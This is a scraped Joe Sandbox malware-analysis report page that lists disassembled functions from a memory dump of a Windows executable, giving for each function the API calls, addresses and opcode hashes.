Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 0f2740a133abb1f2623aaf9f66b3391378ece259b8f0cb92e066cc6931e23fb7
Instruction ID: e887b442e83d87fa4bc6bbe2f03b54351b877cc3ea15391215183766b1d89f04
Opcode Fuzzy Hash: 0f2740a133abb1f2623aaf9f66b3391378ece259b8f0cb92e066cc6931e23fb7
Instruction Fuzzy Hash: 5FE0D832140249ABDF029F61DC45FEA379CAF0C3C1F488021BA44E2160EB71DEC5DB60

Function 009FAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00A12641,000000FF), ref: 009FACB0
CoUninitialize.COMBASE(?,?,?,?,00A12641,000000FF), ref: 009FACB5

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 792f7512f27415a5e2b7e04909279377f7175c3eff3044fc21214161e879cd4f
Instruction ID: 49e7f044db6f816cd03e4bb561f7321efcb1956004d0e39ff771a0420b77a4cf
Opcode Fuzzy Hash: 792f7512f27415a5e2b7e04909279377f7175c3eff3044fc21214161e879cd4f
Instruction Fuzzy Hash: 87E06576604650EFCB11EF5DDC06B55FBA8FB88B20F104366F416D37A0CB74A841CA90

Function 009EA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,009EA23A,?,009E755C,?,?,?,?), ref: 009EA254

Part of subcall function 009EBB03: _wcslen.LIBCMT ref: 009EBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,009EA23A,?,009E755C,?,?,?,?), ref: 009EA280

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 8a2cfc25d976d6930089b4a8690b7a93cf5c502bff82284fa85d3b3fecbe0b70
Instruction ID: 94e17d503f1449d9e8bc30dfdcccbdaf6b4cfa53b301d1ef6a9bd5c7e1c8e7fa
Opcode Fuzzy Hash: 8a2cfc25d976d6930089b4a8690b7a93cf5c502bff82284fa85d3b3fecbe0b70
Instruction Fuzzy Hash: 91E09232500168ABCF11EB65CC05BD977ACAB0C3E1F044261FE54E32A0D770DE45CAA0

Function 009FDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 009FDEEC

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

SetDlgItemTextW.USER32(00000065,?), ref: 009FDF03

Part of subcall function 009FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FB579
Part of subcall function 009FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FB58A
Part of subcall function 009FB568: IsDialogMessageW.USER32(00010406,?), ref: 009FB59E
Part of subcall function 009FB568: TranslateMessage.USER32(?), ref: 009FB5AC
Part of subcall function 009FB568: DispatchMessageW.USER32(?), ref: 009FB5B6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 72fb7aece7a12226c814ff1e50fade816eef46a11a0bda7c4eb00826c04a6c36
Instruction ID: 744df267784bbbb3cf50f57db62fb8b30c31b16c1a95d661927bc2e9f3cf128a
Opcode Fuzzy Hash: 72fb7aece7a12226c814ff1e50fade816eef46a11a0bda7c4eb00826c04a6c36
Instruction Fuzzy Hash: 49E092B640038826DF12FBA5DC06FAE3B6C5B55785F440861B344EA0B2DA7DEA128761

Function 009F081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009F0836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EF2D8,Crypt32.dll,00000000,009EF35C,?,?,009EF33E,?,?,?), ref: 009F0858

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: ea046200a59d587980e13927478b74cf7234d8e89a111f9af1f671395f975296
Instruction ID: 450a9bdea263e3b500a2d6e2f0720d0d758c1ae0f0f51547806372c17bfd4b06
Opcode Fuzzy Hash: ea046200a59d587980e13927478b74cf7234d8e89a111f9af1f671395f975296
Instruction Fuzzy Hash: C0E012768001586ADF11AB959D05FEA7BACEF4D3D1F0440657645E2044D674DA848BA0

Function 009FA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 009FA3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 009FA3E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: f50b09134e538684e6005de5b5f6e000c76df3ddf3304e598bb8457db628b77c
Instruction ID: 542b286e6eb7834334c641c03e4e3d650c4cd415d7f85c291f75ce66589d6a6b
Opcode Fuzzy Hash: f50b09134e538684e6005de5b5f6e000c76df3ddf3304e598bb8457db628b77c
Instruction Fuzzy Hash: 27E0EDB150021CEBCB10DF5AC5417A9BBE8EF04361F10845AA94A93251E3B4AE44DB91

Function 00A02B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A02BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A02BB5

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: e4cab1f65489b368b2446b8a8ec7e5b38fb00b23ce65ddc1554e363b087beae4
Instruction ID: bb03da2ace1c278858e985f416be67ec0373bff2bf16232a834ebbadf2151d0e
Opcode Fuzzy Hash: e4cab1f65489b368b2446b8a8ec7e5b38fb00b23ce65ddc1554e363b087beae4
Instruction Fuzzy Hash: 44D0223A65430C28EC14AFB43E0F7983389BD83BB1BE04A9AF420C58C1EE908080A311

Function 009E12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 009E1306
ShowWindow.USER32(00000000), ref: 009E130D

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 202ff63c7bc89398abcc6fd16046ad137c780f5eb1c85f93caca097419c49804
Instruction ID: 81b867bd27ae074b5fb90d7e82984fa99aea354e4a87fec47fe77b925cb11266
Opcode Fuzzy Hash: 202ff63c7bc89398abcc6fd16046ad137c780f5eb1c85f93caca097419c49804
Instruction Fuzzy Hash: E3C0123B05C240BFCF018BF9DC09C2BBBA8ABE6312F04CA08B2A5C0060C23AC110DB11

Function 009E1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E1A09

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e76a9b4ca7eb3d360801ed62e142833b736f5189e01d8140bd155fcca38c8f5e
Instruction ID: 4f729a52aabd7279531ffe2c2cd95674eb495d5c52a6292839fa2002d45d2d31
Opcode Fuzzy Hash: e76a9b4ca7eb3d360801ed62e142833b736f5189e01d8140bd155fcca38c8f5e
Instruction Fuzzy Hash: 16C1E470A002949FEF16DF69C884BBD7BA9AF59310F1801B9EC45DB386DB309D84CB61

Function 009E3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E3BBF

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 0f96eace66673b4852179bcf675222a3ca3e279bede2a2422f5a7616e925f547
Instruction ID: bd56bc9f619577433fb5566a18034bd2a95bc2bce9ee16252b50672f2b94700e
Opcode Fuzzy Hash: 0f96eace66673b4852179bcf675222a3ca3e279bede2a2422f5a7616e925f547
Instruction Fuzzy Hash: EC71C271500B84AECB26DB71CC45AE7B7E9AF54301F44492EE6EB87241DA32AE84CF11

Function 009E8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E8289

Part of subcall function 009E13DC: __EH_prolog.LIBCMT ref: 009E13E1

Part of subcall function 009EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009EA598

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 3c581011f6d77d1356f73ae1012410d6e9d4c448755ff117610ccd77d7b99532
Instruction ID: 8146aabef2cc4992bbfa9429eec79f474e828985351907f2e1cdb570f2939892
Opcode Fuzzy Hash: 3c581011f6d77d1356f73ae1012410d6e9d4c448755ff117610ccd77d7b99532
Instruction Fuzzy Hash: 3A41B6719446989ADB22DBA2CC55BFAB3BCAF40304F4404EAE18E97093EB745EC5CB50

Function 009E13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E13E1

Part of subcall function 009E5E37: __EH_prolog.LIBCMT ref: 009E5E3C

Part of subcall function 009ECE40: __EH_prolog.LIBCMT ref: 009ECE45

Part of subcall function 009EB505: __EH_prolog.LIBCMT ref: 009EB50A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 63b78b3f9eeab9bb443f8d72e17c7736d24916e955494e5e227c43c6d63d90b5
Instruction ID: eaa9449cb92d117336720b931286e25ca46913a3eeca14ce6c4936253aca6076
Opcode Fuzzy Hash: 63b78b3f9eeab9bb443f8d72e17c7736d24916e955494e5e227c43c6d63d90b5
Instruction Fuzzy Hash: FD415EB0905B409ED725CF3A8885AE7FBE5BF19300F50492EE5FE83282CB316654CB10

Function 009E13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E13E1

Part of subcall function 009E5E37: __EH_prolog.LIBCMT ref: 009E5E3C

Part of subcall function 009ECE40: __EH_prolog.LIBCMT ref: 009ECE45

Part of subcall function 009EB505: __EH_prolog.LIBCMT ref: 009EB50A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ef7129196063235977fd996b18afc6fb5edbc53c62b82090fb01e19c9616205b
Instruction ID: 6ae05fde6942d44b7a9a63a99e67741354edca8980c54eea405c030fecea5631
Opcode Fuzzy Hash: ef7129196063235977fd996b18afc6fb5edbc53c62b82090fb01e19c9616205b
Instruction Fuzzy Hash: 41413EB0905B809ED725DF7A8885AE7FBE5BF19310F50492EE5FE83281CB316654CB10

Function 009FB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009FB098

Part of subcall function 009E13DC: __EH_prolog.LIBCMT ref: 009E13E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 34d660343016739c3befcbb59538767548b5efa267d2c8acb47557d9707cc55a
Instruction ID: c6658cccce30d06fcf03123381220c2cf98dbd0de552f1699bfb8ff106b24a97
Opcode Fuzzy Hash: 34d660343016739c3befcbb59538767548b5efa267d2c8acb47557d9707cc55a
Instruction Fuzzy Hash: 6031AB75904249DACF15DF65C951AFEBBB8AF49300F10449EE409B3282D735AE04CB61

Function 00A0AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00A13A34), ref: 00A0ACF8

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: b46987b6e2f374d31734281e31fb1ed87df42195f31cecd5688c1a12b96f43e9
Instruction ID: b01b33698772431903d10a9a5fe9f9a0a1edfd469c479a4bc53688524816b9a2
Opcode Fuzzy Hash: b46987b6e2f374d31734281e31fb1ed87df42195f31cecd5688c1a12b96f43e9
Instruction Fuzzy Hash: D011A737A007296FEB25DF58FC50A9A73A6ABD436071A8120FD15AB2D4D630DC1287D2

Function 009E9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E921A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: f877a01e532373b036bd78b3df6afc6116e46798982a6d368bbd8f9a53a0f297
Instruction ID: f57342de990af50a20261bf1db39f9bb8eeb4ba94c89e3064c55c8032395240d
Opcode Fuzzy Hash: f877a01e532373b036bd78b3df6afc6116e46798982a6d368bbd8f9a53a0f297
Instruction Fuzzy Hash: 130188339005A8ABCF17ABA9CC81ADEB736BFC8750F014515F926BB252DA34CD45C7A1

Function 00A0C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00A0B136: RtlAllocateHeap.NTDLL(00000008,00A13A34,00000000,?,00A0989A,00000001,00000364,?,?,?,009ED984,?,?,?,00000004,009ED710), ref: 00A0B177

_free.LIBCMT ref: 00A0C4E5

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 7643e156d3b18d9048d1528b21020eed3f153c0f5c24acbe37c069f12a480f66
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: C601F9722003096BE3318F65E89596AFBEDFB85370F25061DE594832C1EA31A905C778

Function 00A0B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00A13A34,00000000,?,00A0989A,00000001,00000364,?,?,?,009ED984,?,?,?,00000004,009ED710), ref: 00A0B177

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a73241df57f214408baddfe02b38a2f244630d41c5313967456b6abf7f75d047
Instruction ID: c2300edde6defb0bddb156253162e97abd1f2101bece8a6f613bb200aee0e853
Opcode Fuzzy Hash: a73241df57f214408baddfe02b38a2f244630d41c5313967456b6abf7f75d047
Instruction Fuzzy Hash: 7AF0B43662512CA7EB215B62BE15B9F7758AF41B60B188311BC18961D0CB30D90182F4

Function 00A03C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00A03C3F

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
